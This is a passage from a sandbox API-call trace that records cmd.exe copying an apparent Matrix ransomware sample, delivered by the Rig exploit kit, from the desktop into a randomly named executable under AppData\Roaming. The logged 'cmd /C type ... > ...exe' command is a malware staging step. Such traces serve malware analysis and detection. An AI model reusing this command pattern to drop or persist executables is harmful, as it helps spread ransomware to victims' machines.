lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x9, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x9, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegCloseKey (hKey=0x40) returned 0x0 [0092.690] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886347 [0092.690] srand (_Seed=0x5b886347) [0092.690] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" [0092.690] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" [0092.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0092.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0092.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.691] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.691] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0092.691] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0092.691] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0092.691] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0092.691] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0092.691] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0092.691] GetEnvironmentStringsW () returned 0x2b22c8* [0092.691] FreeEnvironmentStringsW (penv=0x2b22c8) returned 1 [0092.691] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.691] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.691] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0092.691] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0092.691] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0092.691] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0092.691] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0092.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.692] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc00, lpFilePart=0x14fbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fbfc*="Desktop") returned 0x18 [0092.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.692] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.692] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0092.692] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.692] GetEnvironmentStringsW () returned 0x2b2ae8* [0092.693] FreeEnvironmentStringsW (penv=0x2b2ae8) returned 1 [0092.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.693] GetConsoleOutputCP () returned 0x1b5 [0092.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.693] GetUserDefaultLCID () returned 0x409 [0092.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a7d4950, cchData=8 | out: lpLCData=":") returned 2 [0092.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd40, cchData=128 | out: lpLCData="0") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd40, cchData=128 | out: lpLCData="0") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd40, cchData=128 | out: lpLCData="1") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a7d4940, cchData=8 | out: lpLCData="/") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a7d4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a7d4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a7d4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a7d4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a7d4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a7d4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a7d4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a7d4930, cchData=8 | out: lpLCData=".") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a7d4920, cchData=8 | out: lpLCData=",") returned 2 [0092.694] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0092.695] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0092.696] _wcsicmp (_String1="type", _String2=")") returned 75 [0092.696] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0092.696] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0092.696] _wcsicmp (_String1="IF", _String2="type") returned -11 [0092.696] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0092.696] _wcsicmp (_String1="REM", _String2="type") returned -2 [0092.696] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] GetFileType (hFile=0x7) returned 0x2 [0092.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.701] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14fc38 | out: lpMode=0x14fc38) returned 1 [0092.701] _dup (_FileHandle=1) returned 3 [0092.701] _close (_FileHandle=1) returned 0 [0092.701] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", _String2="con") returned -53 [0092.701] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14fc08, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0092.701] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0092.702] GetConsoleTitleW (in: lpConsoleTitle=0x14fa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.702] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0092.702] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0092.702] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0092.702] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0092.703] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.703] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f59c) returned 0x2a0e20 [0092.704] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0092.704] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0092.704] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0092.704] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e4a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0092.704] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] GetFileType (hFile=0x54) returned 0x1 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e500 | out: lpFileSizeHigh=0x14e500*=0x0) returned 0x7d600 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] GetFileType (hFile=0x4c) returned 0x1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] GetFileType (hFile=0x4c) returned 0x1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.706] GetFileType (hFile=0x4c) returned 0x1 [0092.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.709] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.709] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.710] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.711] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.712] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle 